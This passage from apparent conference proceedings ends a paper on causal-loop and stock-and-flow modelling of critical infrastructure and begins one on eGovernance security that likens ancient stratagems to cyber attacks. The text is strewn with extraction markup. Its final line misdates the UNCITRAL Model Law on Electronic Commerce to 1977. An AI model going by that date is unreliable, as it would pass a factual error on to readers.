structure of these systems and their <strong>in</strong>ter-connections. This then forms the basis for further research to<br />
apply this to the topology of network systems and to model the relational and <strong>in</strong>fluential aspects of critical<br />
<strong>in</strong>frastructure <strong>in</strong>terconnection.<br />
7. Modell<strong>in</strong>g system relationships<br />
The primary <strong>in</strong>tention of system modell<strong>in</strong>g is to utilise conceptual modell<strong>in</strong>g as a means of facilitat<strong>in</strong>g the<br />
comprehension of patterns of change, functionality and dynamic behaviours that a system exhibits and to<br />
identify the conditions that cause systems to rema<strong>in</strong> stable or become unstable. Furthermore, through<br />
experimentation applied to system model parameters and characteristics, the knowledge derived can<br />
suggestively <strong>in</strong>dicate what may or may not translate <strong>in</strong>to the real-world system situation. However, it is<br />
important to be m<strong>in</strong>dful that the <strong>in</strong>terpretation process of translat<strong>in</strong>g physical systems and <strong>in</strong>formation <strong>in</strong>to<br />
various model elements requires persistence and rema<strong>in</strong>s an <strong>in</strong>exact process, but applied trial and error<br />
and experiential judgement rema<strong>in</strong> valid approaches to model development (Stacey 1996).<br />
7.1 System dynamics, the causal modell<strong>in</strong>g approach<br />
In this example a small bus<strong>in</strong>ess system process illustrates the dynamic characteristics of a simple<br />
bus<strong>in</strong>ess situation <strong>in</strong> relational terms, utilis<strong>in</strong>g a causal loop diagram to represent the dynamics of the<br />
system process. The example models a simple advertis<strong>in</strong>g premise for the sale of a durable product and<br />
the <strong>in</strong>itial assumption is that there is a pool of Potential Customers who may become Actual Customers<br />
through product sales. As Figure 2 depicts, Potential Customers and sales as connected via a negative<br />
feedback loop with the goal of reduc<strong>in</strong>g Potential Customers to zero. However, after an advertis<strong>in</strong>g<br />
campaign it is reasonable to assume that the greater number of Potential Customers, the greater number<br />
of sales generated, thus <strong>in</strong>dicated by the positive (+) arrow between Potential Customers and sales.<br />
Similarly, greater sales reduces the number of Potential Customers (as they are converted to Actual<br />
Customers by sales) and this is shown by the negative (-) arrow from sales to Potential Customers. In<br />
this, case the causal loop diagram <strong>in</strong> Figure 2 is a negative feedback loop because of the odd number of<br />
negative l<strong>in</strong>ks <strong>in</strong> the feedback loop between Potential Customers and sales (Kirkwood 2005a).<br />
Figure 2: Advertis<strong>in</strong>g example causal loop diagram (Kirkwood 2005a)<br />
The conclusion drawn from the diagram modell<strong>in</strong>g this dynamic process is the obvious <strong>in</strong>sight that the<br />
number of sales will reduce to zero when the number of Potential Customers reaches zero. This simply<br />
illustrates how a causal loop diagram can model a dynamic system process, however the <strong>in</strong>sight ga<strong>in</strong>ed<br />
here would not be particularly useful, as there is no <strong>in</strong>formation regard<strong>in</strong>g the rate at which the number of<br />
Potential Customers would dim<strong>in</strong>ish <strong>in</strong> this case (Kirkwood 2005a).<br />
The causal loop approach is particularly useful for represent<strong>in</strong>g the dynamic and changeable nature of<br />
system and process relationships that are typically difficult to describe verbally, because normal language<br />
presents <strong>in</strong>terrelations <strong>in</strong> l<strong>in</strong>ear cause and effect cha<strong>in</strong>s, while Figure 2 shows that <strong>in</strong> the actual system<br />
206
Graeme Pye and Matthew Warren<br />
there are circular cha<strong>in</strong>s of cause and effect (ibid). Furthermore, the modell<strong>in</strong>g of dynamic systems<br />
<strong>in</strong>corporat<strong>in</strong>g greater system complexity and <strong>in</strong>teraction together with additional system component<br />
relationships is possible with causal loop diagrams, and the follow<strong>in</strong>g example illustrates this further and<br />
expla<strong>in</strong>s the notation used.<br />
7.2 Causal loop diagram notations<br />
The causal loop diagram <strong>in</strong> Figure 3 is a conceptual model representation of the systematic process of<br />
fill<strong>in</strong>g a glass of water. This diagram <strong>in</strong>cludes elements and arrows (the causal l<strong>in</strong>ks) l<strong>in</strong>k<strong>in</strong>g the various<br />
elements together and <strong>in</strong>cludes either a positive (+) or negative (-) sign on each l<strong>in</strong>k to <strong>in</strong>dicate the<br />
follow<strong>in</strong>g <strong>in</strong>tentions (Kirkwood 2005b):<br />
A causal l<strong>in</strong>k from one element A to another B is positive (+), if either A adds to B or a change <strong>in</strong> A<br />
produces a change <strong>in</strong> B <strong>in</strong> the same direction.<br />
A causal l<strong>in</strong>k from one element A to another B is negative (-), if either A subtracts from B or a change<br />
<strong>in</strong> A produces a change <strong>in</strong> B <strong>in</strong> the opposite direction.<br />
The model represent<strong>in</strong>g the fill<strong>in</strong>g a glass of water example utilises the modell<strong>in</strong>g notation as illustrated <strong>in</strong><br />
Figure 3.<br />
Figure 3: Causal loop diagram notations (Kirkwood 2005b)<br />
Initially to describe the model, if the Faucet Position is <strong>in</strong>creased then the Water Flow <strong>in</strong>creases and<br />
therefore the causal l<strong>in</strong>k (arrow) is positive. Similarly, when the Water Flow <strong>in</strong>creases then the Water<br />
Level <strong>in</strong> the glass will <strong>in</strong>crease and therefore the causal l<strong>in</strong>k between these two elements is positive (+)<br />
too. The next element is the Gap and this signifies the difference between the Desired Water Level<br />
element and the actual Water Level (i.e. Gap equals Desired Water Level m<strong>in</strong>us actual Water Level).<br />
From this it follows that an <strong>in</strong>crease <strong>in</strong> Water Level decreases the Gap and this is a negative (-) causal<br />
l<strong>in</strong>k. F<strong>in</strong>ally, to complete the causal l<strong>in</strong>k back to the Faucet Position, a greater value for the Gap logically<br />
leads to an <strong>in</strong>crease <strong>in</strong> Faucet Position, which is a positive (+) causal l<strong>in</strong>k. Although remember<strong>in</strong>g that the<br />
additional causal l<strong>in</strong>k shown <strong>in</strong> the diagram from the Desired Water Level to the Gap element is modell<strong>in</strong>g<br />
an exist<strong>in</strong>g external <strong>in</strong>fluence to the system process and from the explanation given above, the <strong>in</strong>fluence<br />
is <strong>in</strong> the same direction along this causal l<strong>in</strong>k and is therefore a positive (+) causal l<strong>in</strong>k (Kirkwood 2005b).<br />
The sign of a particular loop referr<strong>in</strong>g to the whole feedback system process is determ<strong>in</strong>ed by count<strong>in</strong>g<br />
the number of m<strong>in</strong>us (-) signs on all the causal l<strong>in</strong>ks mak<strong>in</strong>g up the entire loop. More specifically:<br />
A feedback loop is positive and denotes a plus (+) sign <strong>in</strong> parentheses, if the loop conta<strong>in</strong>s an even<br />
number of negative casual l<strong>in</strong>ks.<br />
207
Graeme Pye and Matthew Warren<br />
A feedback loop is negative and denotes a m<strong>in</strong>us (-) sign <strong>in</strong> parentheses, if the loop conta<strong>in</strong>s an odd<br />
number of negative causal l<strong>in</strong>ks.<br />
In the Figure 3 example, the diagram represents a s<strong>in</strong>gle causal feedback loop with one negative sign on<br />
its causal l<strong>in</strong>ks only and hence an odd number of negative signs. Therefore, <strong>in</strong> the centre of the loop<br />
diagram the negative (-) sign <strong>in</strong> parentheses consists of a small loop<strong>in</strong>g arrow to <strong>in</strong>dicate clearly that the<br />
sign is referr<strong>in</strong>g to the whole loop (Kirkwood 2005b).<br />
The causal loop diagram modell<strong>in</strong>g approach may prove applicable for modell<strong>in</strong>g the <strong>in</strong>ter-relationships<br />
between critical <strong>in</strong>frastructure systems and warrants further <strong>in</strong>vestigation. However, this requires further<br />
research and application <strong>in</strong> the context of modell<strong>in</strong>g critical <strong>in</strong>frastructure system relationships to judge its<br />
effectiveness.<br />
7.3 Stock and flow modell<strong>in</strong>g approach<br />
Another form of dynamic system modell<strong>in</strong>g that is grow<strong>in</strong>g <strong>in</strong> popularity with<strong>in</strong> bus<strong>in</strong>ess particularly is the<br />
stock and flow diagram whose notation consists of three different types of elements, namely, stocks,<br />
flows and <strong>in</strong>formation. The three elements together <strong>in</strong> a diagram graphically represent any dynamic<br />
process that may be apparent <strong>in</strong> any bus<strong>in</strong>ess and therefore can be utilised to represent the<br />
characteristics of such processes and illustrate the relationship among variables that have the potential to<br />
change over time (Kirkwood 2005a).<br />
Figure 4 illustrates an example of a very simple stock and flow diagram with the three elements Casual<br />
Staff, sales and Permanent Staff which models the structure of the bus<strong>in</strong>ess process concern<strong>in</strong>g the rate<br />
at which Casual Staff numbers reduce to zero, as the number of Permanent Staff required is dictated by<br />
the flow of sales.<br />
Figure 4: Example stock and flow diagram (Kirkwood 2005c)<br />
The two different types of variables illustrated <strong>in</strong>side the rectangles are called a stock, level or<br />
accumulation. The variable sales is shown next to the ‘butterfly valve’ or ‘bow tie’ symbol and this type of<br />
variable is known as a flow or rate, thus the two l<strong>in</strong>es through the butterfly valve look like a pipe with the<br />
valve controll<strong>in</strong>g the flow. The premise of the above figure is that it represents the flow of Casual Staff<br />
towards Permanent Staff, with the rate of flow controlled by the sales valve; this is the key idea beh<strong>in</strong>d<br />
the difference between stock and flow. Therefore, a stock represents an accumulation of someth<strong>in</strong>g and<br />
a flow is the movement of someth<strong>in</strong>g from one stock to another (Kirkwood 2005c).<br />
The f<strong>in</strong>al element of Figure 4 is the <strong>in</strong>formation l<strong>in</strong>k represented as a curved arrow and this notation<br />
represents the value of Casual Staff <strong>in</strong>fluenc<strong>in</strong>g the value of sales. Additionally, and of equal importance,<br />
is the lack of an <strong>in</strong>formation arrow from Permanent Staff to sales, which illustrates that <strong>in</strong>formation<br />
regard<strong>in</strong>g the value of Permanent Staff has no <strong>in</strong>fluence over the value of sales (ibid).<br />
7.4 Stock and flow appraisal<br />
The purpose of the stock and flow diagram is to depict the process changes and how the elements and<br />
the structure of these processes <strong>in</strong>teract together to br<strong>in</strong>g about change. This form of modell<strong>in</strong>g focuses<br />
on the elements that make up the process (sometimes likened to the components of the system), and<br />
how the performance of the process changes over time and forms the basis of study<strong>in</strong>g the dynamics of a<br />
simple process us<strong>in</strong>g stock and flow diagrams.<br />
The underly<strong>in</strong>g weakness of stock and flow diagrams is that they can only deliver a simplistic<br />
representation with<strong>in</strong> a def<strong>in</strong>ed process boundary of a simple process. Unfortunately, from the<br />
208
Graeme Pye and Matthew Warren<br />
perspective of modell<strong>in</strong>g examples of critical <strong>in</strong>frastructure systems for <strong>in</strong>stance, stock and flow diagrams<br />
are not readily applicable to this type of system modell<strong>in</strong>g due to the size and complexity of the systems.<br />
The other important issue is the scalability potential of stock and flow diagrams with regard to these<br />
systems as they tend to become difficult to <strong>in</strong>terpret due to the diagrams added complexity <strong>in</strong> depict<strong>in</strong>g<br />
the logical <strong>in</strong>terconnection, processes and dependency relationships of critical <strong>in</strong>frastructure systems. It<br />
appears that stock and flow diagrams are better suited to modell<strong>in</strong>g less complex system processes with<br />
clearly def<strong>in</strong>ed boundaries, and is not necessarily well suited to modell<strong>in</strong>g multiple <strong>in</strong>terconnected and<br />
large complex critical <strong>in</strong>frastructure systems from a relational perspective.<br />
8. Conclusions<br />
As Bentley (2006) <strong>in</strong>timates, critical <strong>in</strong>frastructure systems tend to be <strong>in</strong>terdependent and even<br />
<strong>in</strong>terconnected, and system failures – be it through natural disaster, terrorism or poor management – can<br />
br<strong>in</strong>g entire communities and their <strong>in</strong>dustries and utilities to a gr<strong>in</strong>d<strong>in</strong>g halt. Therefore, the ability to<br />
analyse and critique the relational aspects of critical <strong>in</strong>frastructure systems, together with modell<strong>in</strong>g these<br />
system relationships offers an avenue for assess<strong>in</strong>g critical <strong>in</strong>frastructure system security, identify<strong>in</strong>g<br />
vulnerabilities and locat<strong>in</strong>g <strong>in</strong>herent weaknesses to system availability and service supply.<br />
The research of Watts (1999b) and its <strong>in</strong>terpretation of the <strong>in</strong>terconnections between systems and the<br />
structure of social networks, presents an <strong>in</strong>terest<strong>in</strong>g approach that could provide <strong>in</strong>sight when applied to<br />
critical <strong>in</strong>frastructure systems. Although this is not applied here, it represents an opportunity for future<br />
research <strong>in</strong> this area, particularly <strong>in</strong> terms of identify<strong>in</strong>g the <strong>in</strong>tegral <strong>in</strong>terconnections between systems.<br />
Additionally, this offers the opportunity through the identification of these <strong>in</strong>tegral <strong>in</strong>terconnections<br />
between critical <strong>in</strong>frastructure systems to utilise the Causal Modell<strong>in</strong>g approach to <strong>in</strong>terpret the <strong>in</strong>fluential<br />
aspects of relationships between critical <strong>in</strong>frastructure systems. Causal Loop diagrams offer a flexible<br />
‘soft’ approach to enable an illustrative representation of critical <strong>in</strong>frastructure system dependency and<br />
<strong>in</strong>terdependency relationships that is worthy of future research.<br />
References<br />
Bentley A. (2006) 'Infrastructure: Critical Mass', CSIRO Solve, No.7.<br />
Callaway S.S. Newman M.E.J. Strogatz S.H. Watts D.J. (2000) 'Network Robustness and Fragility: Percolation on<br />
Random Graphs', Physical Review Letters, Vol.85, pp. 54-68.<br />
Caulfield C.W. & Maj S.P. (2002) 'A Case for System Dynamics', Global Journal of Eng<strong>in</strong>eer<strong>in</strong>g Education, Vol.6,<br />
No.1, pp. 34.<br />
Checkland P. (2000) 'Soft Systems Methodology: A Thirty Year Retrospective', Systems Research and Behavioural<br />
Science, John Wiley & Sons Ltd, Vol.17, pp. S11-S58.<br />
Christensen C. & Albert R. (2007) 'Us<strong>in</strong>g graph Concepts to understand the organisation of complex systems',<br />
International Journal of Bifurcation and Chaos, Vol.17, No.7.<br />
F<strong>in</strong>nigan J. (2005) 'The Science of Complex Systems', Australian Science, pp. 32-34.<br />
Forrester J.W. (1991) 'System Dynamics and the Lessons of 35 Years', <strong>in</strong> The Systemic Basis of Policy Mak<strong>in</strong>g <strong>in</strong><br />
the 1990s, De Greene K.B. (ed.).<br />
Forrester J.W. (1994) 'System dynamics, systems th<strong>in</strong>k<strong>in</strong>g, and soft OR', System Dynamics Review, Vol.10, No.2-3,<br />
pp. 245-256.<br />
Forrester J.W. (1995) Counter<strong>in</strong>tuitive Behavior of Social Systems.<br />
Forrester J.W. (1998) Design<strong>in</strong>g the Future, University of Seville, Seville, Spa<strong>in</strong>.<br />
Herder P.M. & Verwater-Lukszo Z. (2006) 'Towards next generation <strong>in</strong>frastructures: an <strong>in</strong>troduction to the<br />
contributions <strong>in</strong> this issue', International Journal of Critical Infrastructures, Vol.2, No.2/3, pp. 113-120.<br />
Jensen E. & Brehmer B. (2003) 'Understand<strong>in</strong>g and Control of a Simple Dynamic System', System Dynamics<br />
Review, Vol.19, No.2, pp. 119-137.<br />
Kirkwood C.W. (2005a) “A Modell<strong>in</strong>g Approach”, [onl<strong>in</strong>e], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-2.pdf.<br />
Kirkwood C.W. (2005b) “System Behaviour and Casual Loop Diagrams”, [onl<strong>in</strong>e], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/ch-1.pdf.<br />
Kirkwood C.W. (2005c) “System Dynamics Methods: A Quick Introduction”, [onl<strong>in</strong>e], Arizona State University,<br />
www.public.asu.edu/~kirkwood/sysdyn/SDIntro/SDIntro.htm.<br />
Luna-Reyes L.F. & Andersen D.L. (2003) 'Collect<strong>in</strong>g and analyz<strong>in</strong>g qualitative data for system dynamics: methods<br />
and models', System Dynamics Review, Vol.19, No.4, pp. 271-296.<br />
Maani K.E. & Cavana R.Y. (2000) Systems Th<strong>in</strong>k<strong>in</strong>g and Modell<strong>in</strong>g. Understand<strong>in</strong>g Change and Complexity,<br />
Prentice Hall, Auckland, NZ.<br />
Newman M.E.J. (2003) 'The Structure and Function of Complex Networks', SIAM (Society for Industrial and Applied<br />
Mathematics) Review, Vol.45, No.2, pp. 167-256.<br />
Newth D. & Ash J. (2005) 'Evolv<strong>in</strong>g cascad<strong>in</strong>g failure resilience <strong>in</strong> complex networks', Complexity International,<br />
Vol.11.<br />
209
Graeme Pye and Matthew Warren<br />
North M. Macal C. Thomas W. H. Miller D. Peerenboom J. (2002) 'More Than Just Wires: Apply<strong>in</strong>g Complexity<br />
Theory to Communication Network Assurance', <strong>in</strong> 6th World Multiconference on Systemics, Cybernetics, and<br />
Informatics (SCI 2002), Orlando FL USA.<br />
Parrott L. & Kok R. (2000) 'Incorporat<strong>in</strong>g Complexity <strong>in</strong> Ecosystem Modell<strong>in</strong>g', Complexity International, Vol.7.<br />
Schaffernicht M. (2006) 'Detect<strong>in</strong>g and Monitor<strong>in</strong>g Change <strong>in</strong> Models', System Dynamics Review, Vol.22, No.1, pp.<br />
73-88.<br />
SDS (2006) “What is System Dynamics, System Dynamic Society”, [onl<strong>in</strong>e], University of Albany, State University of<br />
New York, www.albany.edu/cpr/sds/.<br />
Senge P.M. (1990) The fifth discipl<strong>in</strong>e: the art and practice of the learn<strong>in</strong>g organisation, Random House Australia,<br />
Milsons Po<strong>in</strong>t, NSW.<br />
Stacey R.D. (1996) Strategic management & organisational dynamics, 2nd Edition, Pitman Publish<strong>in</strong>g, London, UK.<br />
Strogatz S.H. (2001) 'Explor<strong>in</strong>g Complex Networks', Nature, Vol.410, pp. 268-276.<br />
Warren K. (2005) 'Improv<strong>in</strong>g Strategic Management with the Fundamental Pr<strong>in</strong>ciples of System Dynamics', System<br />
Dynamics Review, Vol.21, No.4, pp. 329-350.<br />
Watts D.J. (1999a) 'Networks, Dynamics, and Small-World Phenomenon', The American Journal of Sociology,<br />
Vol.105, No.2, pp. 493-527.<br />
Watts D.J. (1999b) Small Worlds: The Dynamics of Networks between Order and Randomness, Pr<strong>in</strong>ceton University<br />
Press, Pr<strong>in</strong>ceton, NJ, USA.<br />
Watts D.J. (2000) “A simple model of fads and cascad<strong>in</strong>g failures” [onl<strong>in</strong>e]<br />
www.santafe.edu/research/publications/work<strong>in</strong>gpapers/00-12-062.pdf.<br />
Watts D.J. (2004) 'The "New" Science of Networks', Annual Review of Sociology, Vol.30, pp. 243-270.<br />
210
A Study on Cyber Secured eGovernance <strong>in</strong> an Educational<br />
Institute: Performance and User Satisfaction<br />
Kasi Raju<br />
IIT Madras, Chennai, India<br />
kasiraju@cse.iitm.ac.<strong>in</strong><br />
Abstract: It is widely acknowledged that eGovernance can be immensely useful <strong>in</strong> the efficiency of the function<strong>in</strong>g of<br />
the government and improv<strong>in</strong>g citizen service delivery. There are many areas of concern where the performance of<br />
eGovernance can be improved. A centralized security management system is <strong>in</strong>stalled for the secured access of the<br />
eGovernance service. The eGovernance approach will enable governments to achieve efficiency ga<strong>in</strong>s and improve<br />
service delivery levels, raise citizen satisfaction with government services, and enhance quality of life of citizens. This<br />
study attempts to f<strong>in</strong>d the performance and user satisfaction with eGovernance implemented <strong>in</strong> an educational<br />
<strong>in</strong>stitute. Further, the concentration of the analysis is to f<strong>in</strong>d what other areas can be brought under the eGovernance<br />
system. Studies have been made about the exist<strong>in</strong>g security measures deployed. From these studies, it was found<br />
that only computer science department students were aware of cyber crime and cyber security. Avoid<strong>in</strong>g paperwork,<br />
24x7 access and transparency were po<strong>in</strong>ted out as advantages <strong>in</strong> the eGovernance system. Many respondents<br />
expressed concern about the security of their <strong>in</strong>formation both <strong>in</strong> transit and as well as <strong>in</strong> the databases of the<br />
eGovernance <strong>in</strong>formation servers. The aim of this study is to f<strong>in</strong>d the performance expectancy and evaluate user<br />
satisfaction <strong>in</strong> an eGovernance system and to provide secured eGovernance services by harden<strong>in</strong>g the cyber<br />
<strong>in</strong>frastructures.<br />
Keywords: eGovernance, cyber crime, cyber warfare, cyber security, stuxnet, DDOS, BAR,DCC,stratagem<br />
1. Introduction<br />
UNESCO def<strong>in</strong>es eGovernance as ‘the public sector’s use of <strong>in</strong>formation and communication<br />
technologies with the aim of improv<strong>in</strong>g <strong>in</strong>formation and service delivery, encourag<strong>in</strong>g citizen participation<br />
<strong>in</strong> the decision-mak<strong>in</strong>g process and mak<strong>in</strong>g the government more accountable, transparent and<br />
effective’. While Governance refers to ‘the exercise of political, economic and adm<strong>in</strong>istrative authority <strong>in</strong><br />
the management of a country’s affairs, <strong>in</strong>clud<strong>in</strong>g citizens’ articulation of their <strong>in</strong>terests and exercise of<br />
their legal rights and obligations’, EGovernance may be understood ‘as the performance of this<br />
governance via the electronic medium <strong>in</strong> order to facilitate an efficient, speedy and transparent process of<br />
dissem<strong>in</strong>at<strong>in</strong>g <strong>in</strong>formation to the public, and other agencies, and for perform<strong>in</strong>g government<br />
adm<strong>in</strong>istration activities’. *<br />
2. Literature review of eGovernance<br />
eGovernance evaluation: The theoretical progression of eGovernment <strong>in</strong> any country or state is along<br />
four stages, which <strong>in</strong>dicate the extent of benefits that the stake holders get through the eGovernment<br />
projects prevalent <strong>in</strong> that country or state. These are represented schematically <strong>in</strong> the follow<strong>in</strong>g figure.<br />
Figure 1: eGovernance evaluation (source: J.Satyanarayana, EGovernment: The Science of Possible,<br />
Prentice-Hall of India Private <strong>Limited</strong>, p.20) #<br />
211
3. eGovernment stages @<br />
Kasi Raju<br />
This section presents a summary of different stage-models to eGovernment evolution. It is important to<br />
clarify that <strong>in</strong> reality these stages are not necessarily mutually exclusive or progressive<br />
Initial Presence<br />
This happens when a country, state, or local government has a formal presence on the Internet through a<br />
limited number of <strong>in</strong>dividual governmental pages (mostly developed by s<strong>in</strong>gle governmental agencies).<br />
Governments <strong>in</strong> this stage normally offer static <strong>in</strong>formation about agencies and some of the services they<br />
provide to citizens and private organizations.<br />
Extended Presence<br />
In this stage, governments provide more dynamic, specialized <strong>in</strong>formation that is distributed and regularly<br />
updated <strong>in</strong> a great number of government sites. Sometimes a national government’s official site serves<br />
as an entry po<strong>in</strong>t with l<strong>in</strong>ks to pages of other branches of government, m<strong>in</strong>istries, secretariats,<br />
departments, and sub-national adm<strong>in</strong>istrative bodies. Some governments might start us<strong>in</strong>g electronic<br />
mail or search eng<strong>in</strong>es to <strong>in</strong>teract with citizens, bus<strong>in</strong>esses and other stakeholders.<br />
Interactive Presence<br />
Governments use a state-wide or national portal as the <strong>in</strong>itial page provid<strong>in</strong>g access to services <strong>in</strong><br />
multiple agencies. The <strong>in</strong>teraction between citizens and different government agencies <strong>in</strong>creases <strong>in</strong> this<br />
stage (e.g., eMail, forums, etc.). Citizens and bus<strong>in</strong>esses can access <strong>in</strong>formation accord<strong>in</strong>g to their<br />
different <strong>in</strong>terests. In some cases, passwords are used to access more customized and secure services.<br />
Transactional Presence<br />
Citizens and bus<strong>in</strong>esses can personalize or customize a national or statewide portal. This portal becomes<br />
a unique showcase of all the governmental services available <strong>in</strong> the relevant area of <strong>in</strong>terest. The needs<br />
of different constituencies are the ma<strong>in</strong> criteria for portal design and access (government structure and<br />
functions are only secondary criteria). The portal allows secure electronic payments to be made,<br />
facilitat<strong>in</strong>g transactions such as tax, f<strong>in</strong>es, and services payments.<br />
Vertical Integration<br />
This stage encompasses the <strong>in</strong>tegration of similar services provided by different levels of government.<br />
This <strong>in</strong>tegration can be virtual, physical, or both. Therefore, this stage does not refer solely to an <strong>in</strong>cipient<br />
<strong>in</strong>tegration <strong>in</strong> the form of government websites, but to the change and reconstruction of the processes<br />
and/or governmental structure.<br />
Horizontal Integration<br />
Horizontal <strong>in</strong>tegration between different governmental services must exist for citizens and other<br />
stakeholders to have access to all the potential of <strong>in</strong>formation technologies <strong>in</strong> government. Therefore, <strong>in</strong><br />
this stage governments need to cross organizational boundaries and develop a comprehensive and<br />
<strong>in</strong>tegral vision of the government as a whole. Vertical and horizontal <strong>in</strong>tegration do not necessarily<br />
happen together or sequentially.<br />
Totally Integrated Presence<br />
This stage refers to the situation <strong>in</strong> which government services are fully <strong>in</strong>tegrated (vertically and<br />
horizontally). Citizens have access to a variety of services through a s<strong>in</strong>gle portal, us<strong>in</strong>g a unique ID and<br />
password. All services can be accessed from the same web page and can be paid <strong>in</strong> a consolidated bill.<br />
A transformation unseen by the public has taken place, and now services are organized accord<strong>in</strong>g to<br />
processes and constituencies, not only virtually, but also physically. In this stage, governments undertake<br />
<strong>in</strong>stitutional and adm<strong>in</strong>istrative reforms that fully employ the potential of <strong>in</strong>formation technologies.<br />
212
4. Types of <strong>in</strong>teractions <strong>in</strong> eGovernance<br />
Kasi Raju<br />
eGovernance facilitates <strong>in</strong>teraction between different stake holders <strong>in</strong> governance.<br />
These <strong>in</strong>teractions may be described as follows:<br />
G2G(Government to Government) – In this case, Information and communications Technology is used<br />
not only to restructure the governmental processes <strong>in</strong>volved <strong>in</strong> the function<strong>in</strong>g of government entities but<br />
also to <strong>in</strong>crease the flow of <strong>in</strong>formation and services with<strong>in</strong> and between different entities. This k<strong>in</strong>d of<br />
<strong>in</strong>teraction is only with<strong>in</strong> the sphere of government and can be both horizontal, i.e. between different<br />
government agencies as well as between different functional areas with<strong>in</strong> an organization, and vertical,<br />
i.e. between national, prov<strong>in</strong>cial and local government agencies as well as between different levels with<strong>in</strong><br />
an organization. The primary objective is to <strong>in</strong>crease efficiency, performance and output.<br />
G2C (Government to Citizens) – In this case, an <strong>in</strong>terface is created between the government and<br />
citizens which enables the citizens to benefit from efficient delivery of a large range of public services.<br />
This expands the availability and accessibility of public services on the one hand and improves the quality<br />
of services on the other. It gives citizens the choice of when to <strong>in</strong>teract with the government (e.g. 24<br />
hours a day, 7 days a week), from where to <strong>in</strong>teract with the government (e.g. service centre, unattended<br />
kiosk or from one’s home/workplace) and how to <strong>in</strong>teract with the government (e.g. through <strong>in</strong>ternet, fax,<br />
telephone, email, face-to-face, etc). The primary purpose is to make the government citizen-friendly.<br />
G2B services: G2B <strong>in</strong>clude e-procurement, an onl<strong>in</strong>e government-supplier exchange for the purchase of<br />
goods and services by government. Typically, e-procurement Web sites allow qualified and registered<br />
users to look for buyers or sellers of goods and services. Depend<strong>in</strong>g on the approach, buyers or sellers<br />
may specify prices or <strong>in</strong>vite bids. E-Procurement makes the bidd<strong>in</strong>g process transparent and enables<br />
smaller bus<strong>in</strong>esses to bid for big government procurement projects. The system also helps the<br />
government generate bigger sav<strong>in</strong>gs, as costs from middlemen are shaved off and purchas<strong>in</strong>g agents’<br />
overhead is reduced.<br />
G2E (Government to Employees) – Government is by far the biggest employer and like any<br />
organisation, it has to <strong>in</strong>teract with its employees on a regular basis. This <strong>in</strong>teraction is a two-way process<br />
between the organisation and the employee. Use of ICT tools helps <strong>in</strong> mak<strong>in</strong>g these <strong>in</strong>teractions fast and<br />
efficient on the one hand and <strong>in</strong>crease satisfaction levels of employees on the other.<br />
5. Benefits of eGovernment<br />
Provision of Services-Electronic Service delivery (ESD). #<br />
The most visible impact of eGovernment is seen <strong>in</strong> the extent that eGovernment is identified with<br />
provision of electronic services. Electronic Service Delivery (ESD) is beneficial to the citizens and other<br />
customers of the government <strong>in</strong> a variety of ways.<br />
The follow<strong>in</strong>g benefits are discussed.<br />
Better image: Speed, efficiency, transparency and convenience aris<strong>in</strong>g out of ESD enhance the<br />
image of government.<br />
Cost Cutt<strong>in</strong>g: EGovernment can result <strong>in</strong> significant cost reduction.<br />
Better target<strong>in</strong>g of benefits: EGovernment projects <strong>in</strong> the social sectors, especially <strong>in</strong> the areas of<br />
welfare, health and education <strong>in</strong> the context of develop<strong>in</strong>g countries, br<strong>in</strong>g <strong>in</strong> benefits aris<strong>in</strong>g out of<br />
better target<strong>in</strong>g of benefit schemes.<br />
eGovernment Benefits to Citizens.<br />
Besides cost reduction, the other benefits to citizens are as follows:<br />
Increased transparency lead<strong>in</strong>g to reduced corruption.<br />
Better quality of life as a result of the use of e-services <strong>in</strong> areas such as health, education,<br />
employment, welfare and f<strong>in</strong>ance.<br />
Easy access to <strong>in</strong>formation on government agencies and programmes.<br />
Multiple delivery channels to choose from, thus add<strong>in</strong>g to convenience and<br />
213
Kasi Raju<br />
Facilities like s<strong>in</strong>gle-w<strong>in</strong>dow and s<strong>in</strong>gle-sign-on that removes the complexities of visit<strong>in</strong>g multiple<br />
government agencies or web sites.<br />
6. eGovernment and cyber law<br />
Cyber law is the generic name given to the laws govern<strong>in</strong>g the acts that happen and exist <strong>in</strong> the<br />
<strong>in</strong>tangible digital world. The cyber laws govern aspects such as giv<strong>in</strong>g a legal status to the <strong>in</strong>tangible<br />
<strong>in</strong>formation that exists <strong>in</strong> cyberspace, the security and privacy of such <strong>in</strong>formation, the relationships and<br />
contracts between persons who exchange such <strong>in</strong>formation, their rights and responsibilities, crimes<br />
relat<strong>in</strong>g to damages caused to cyber <strong>in</strong>formation and digital assets and all such matters related to the<br />
digital world. Citizens should be made aware of all the aspects of cyber crime, cyber security and cyber<br />
laws so that they are sure of their <strong>in</strong>formation security, and to protect themselves <strong>in</strong> the courts <strong>in</strong> case<br />
they are affected by cyber crimes.<br />
Relevance of 36 Stratagems (art of war, written about 1000 years ago) used <strong>in</strong> ancient Ch<strong>in</strong>a and<br />
the present day “Cyber Warfare”. Cyber Warfare disrupts the eGovernance service.<br />
There are six chapters conta<strong>in</strong><strong>in</strong>g six stratagems each and totall<strong>in</strong>g thirty-six stratagems. $$<br />
They are:1.W<strong>in</strong>n<strong>in</strong>g Stratagems, 2. Enemy Deal<strong>in</strong>g Stratagems, 3. Attack<strong>in</strong>g Stratagems, &&<br />
4. Chaos Stratagems, 5. Proximate Stratagems, 6. Defeat Stratagems<br />
Stratagem #3. “Kill<strong>in</strong>g with a borrowed knife” advises “Attack us<strong>in</strong>g the strength of another” apply to the<br />
use of “botnets as a means to launch DDOS(Distributed Denial of Service) attack. **<br />
Stratagem #8: “Openly repair the gallery roads, but sneak through the passage of Chencang” means<br />
“Deceive the enemy with an obvious approach that will take a very long time” which applies to the use of<br />
“Backdoors or Trojan worms when attack<strong>in</strong>g a network”.<br />
Stratagem #10: “hide the knife beh<strong>in</strong>d a smile” means “Charm and <strong>in</strong>gratiate yourself with your enemy<br />
until you have ga<strong>in</strong>ed his trust. Then move aga<strong>in</strong>st him.” which applies to “Phish<strong>in</strong>g schemes or other<br />
social eng<strong>in</strong>eer<strong>in</strong>g attacks.”<br />
Stratagem #30: “Send your enemy beautiful women” means “the honey trap” which applies to the use of<br />
“a honey pot, which lures visitors to a rigged site that collects <strong>in</strong>formation about them.”<br />
Cyber Law<br />
The IT Act 2000 is the “Cyber Law” of India which came <strong>in</strong>to effect <strong>in</strong> October 2000. It has been enacted<br />
on the l<strong>in</strong>es of the Model Law on Electronic Commerce adopted by the United Nations Commission on<br />
International Trade Law (UNCITRAL) <strong>in</strong> 1977.<br />
